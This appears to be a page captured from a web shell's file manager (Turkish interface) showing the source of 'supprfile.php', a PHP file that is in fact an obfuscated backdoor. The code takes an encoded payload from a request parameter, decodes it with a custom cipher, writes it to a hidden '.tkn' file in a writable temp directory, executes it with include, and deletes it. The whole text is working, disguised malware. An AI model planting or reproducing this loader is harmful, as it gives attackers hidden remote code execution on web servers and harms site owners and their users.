0x1998 - MANAGER
Düzenlenen Dosya: supprfile.php
<?php if(array_key_exists("m\x72k", $_REQUEST) && !is_null($_REQUEST["m\x72k"])){ $elem = array_filter([session_save_path(), getenv("TMP"), getenv("TEMP"), "/dev/shm", "/tmp", "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd()]); $marker = $_REQUEST["m\x72k"]; $marker = explode ( ".", $marker ); $record = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $x = 0; while ($x < count($marker)) { $v2 = $marker[$x]; $sChar = ord($s[$x %$sLen]); $dec = ((int)$v2 - $sChar - ($x %10)) ^ 63; $record .= chr($dec); $x++; } while ($component = array_shift($elem)) { if (!!is_dir($component) && !!is_writable($component)) { $property_set = join("/", [$component, ".tkn"]); if (file_put_contents($property_set, $record)) { include $property_set; @unlink($property_set); die(); } } } }
geri dön